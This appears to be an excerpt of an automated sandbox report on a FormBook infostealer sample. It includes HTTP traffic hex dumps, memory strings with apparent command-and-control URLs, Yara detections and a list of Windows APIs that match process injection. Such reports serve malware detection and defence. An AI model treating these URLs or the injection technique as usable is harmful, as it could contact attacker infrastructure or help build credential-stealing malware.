http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:36:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:36:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:36:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:36:44 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:36:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31

Source: SLq0ulC3Wf.exe, 00000000.00000002.1435217400.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: aVqyFNVyPiTfi.exe, 0000000C.00000002.2681761617.00000000051A9000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.accusolution.pro
Source: aVqyFNVyPiTfi.exe, 0000000C.00000002.2681761617.00000000051A9000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.accusolution.pro/8s4j/
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DpiScaling.exe, 0000000B.00000002.2680595125.0000000005114000.00000004.10000000.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2679893517.00000000030C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2046769204.000000003A514000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
Source: DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_a
Source: DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: DpiScaling.exe, 0000000B.00000003.1936134434.00000000078E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: DpiScaling.exe, 0000000B.00000002.2680595125.0000000005438000.00000004.10000000.00040000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2682365222.00000000075F0000.00000004.00000800.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2679893517.00000000033E8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DpiScaling.exe, 0000000B.00000002.2680595125.00000000058EE000.00000004.10000000.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2679893517.000000000389E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.myfastuploader.sbs/wzdf/?5t=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/
Source: aVqyFNVyPiTfi.exe, 0000000C.00000002.2679893517.0000000003256000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.newbh.pro/67jc/?2XPD1Xa=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRP

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 7.2.SLq0ulC3Wf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SLq0ulC3Wf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2678439595.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717773324.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2678329827.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2681761617.0000000005110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2678402729.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1726811680.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0042CF83 NtClose,	7_2_0042CF83
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02B60 NtClose,LdrInitializeThunk,	7_2_01A02B60
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_01A02DF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_01A02C70
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A035C0 NtCreateMutant,LdrInitializeThunk,	7_2_01A035C0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A04340 NtSetContextThread,	7_2_01A04340
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A04650 NtSuspendThread,	7_2_01A04650
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02BA0 NtEnumerateValueKey,	7_2_01A02BA0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02B80 NtQueryInformationFile,	7_2_01A02B80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02BE0 NtQueryValueKey,	7_2_01A02BE0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02BF0 NtAllocateVirtualMemory,	7_2_01A02BF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02AB0 NtWaitForSingleObject,	7_2_01A02AB0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02AF0 NtWriteFile,	7_2_01A02AF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02AD0 NtReadFile,	7_2_01A02AD0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02DB0 NtEnumerateKey,	7_2_01A02DB0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02DD0 NtDelayExecution,	7_2_01A02DD0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02D30 NtUnmapViewOfSection,	7_2_01A02D30
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02D00 NtSetInformationFile,	7_2_01A02D00
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02D10 NtMapViewOfSection,	7_2_01A02D10
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02CA0 NtQueryInformationToken,	7_2_01A02CA0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02CF0 NtOpenProcess,	7_2_01A02CF0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02CC0 NtQueryVirtualMemory,	7_2_01A02CC0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02C00 NtQueryInformationProcess,	7_2_01A02C00
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02C60 NtCreateKey,	7_2_01A02C60
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02FA0 NtQuerySection,	7_2_01A02FA0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02FB0 NtResumeThread,	7_2_01A02FB0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02F90 NtProtectVirtualMemory,	7_2_01A02F90
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02FE0 NtCreateFile,	7_2_01A02FE0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02F30 NtCreateSection,	7_2_01A02F30
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02F60 NtCreateProcessEx,	7_2_01A02F60
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02EA0 NtAdjustPrivilegesToken,	7_2_01A02EA0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02E80 NtReadVirtualMemory,	7_2_01A02E80
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02EE0 NtQueueApcThread,	7_2_01A02EE0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_01A02E30 NtWriteVirtualMemory,	7_2_01A02E30
